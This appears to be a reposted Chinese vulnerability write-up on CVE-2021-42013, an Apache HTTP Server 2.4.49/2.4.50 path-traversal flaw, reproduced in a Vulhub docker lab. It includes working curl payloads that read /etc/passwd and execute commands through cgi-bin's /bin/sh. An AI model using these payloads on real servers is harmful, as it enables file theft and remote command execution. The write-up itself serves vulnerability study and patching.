南平建设集团有限公司网站佛山自定义网站建设

pingmian/2026/1/26 0:01:35/文章来源:

南平建设集团有限公司网站,佛山自定义网站建设,公众号创意名字,中介房源管理系统哪个好感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证方式一 curl方式二 bp抓捕 1.5、修复建议说明内容漏洞编号CVE-2021-42013漏洞名称… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证方式一 curl方式二 bp抓捕 1.5、修复建议说明内容漏洞编号CVE-2021-42013漏洞名称Apache HTTP_2.4.50_路径穿越漏洞漏洞评级高危影响范围2.4.492.4.50漏洞描述CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件。修复方案升级至最新版本 1.1、漏洞描述 CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件此漏洞影响Apache HTTP Server 2.4.49和2.4.50而不影响更早版本。 1.2、漏洞等级高危 1.3、影响版本 Apache HTTP Server 2.4.49以及2.4.50两个版本 1.4、漏洞复现 1、基础环境 PathVulhub/httpd/CVE-2021-42013 启动测试环境 docker-compose build sudo docker-compose up -d访问http://your-ip:8080/即可看到Apache HTTP Server的It works! 2、漏洞扫描 3、漏洞验证 Apache HTTP Server 2.4.50修补了以前的CVE-2021-41773漏洞但可以使用.%%32%65进行绕过注意其中的/icons/必须是一个存在且可访问的目录方式一 curl curl -v --path-as-is http://192.168.80.141:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd在服务器上启用mods cgi或cgid后此路径遍历漏洞将允许执行任意命令 curl -v --data echo;id http://192.168.80.141:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh方式二 bp抓捕 1.5、修复建议升级至最新版本

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/85701.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！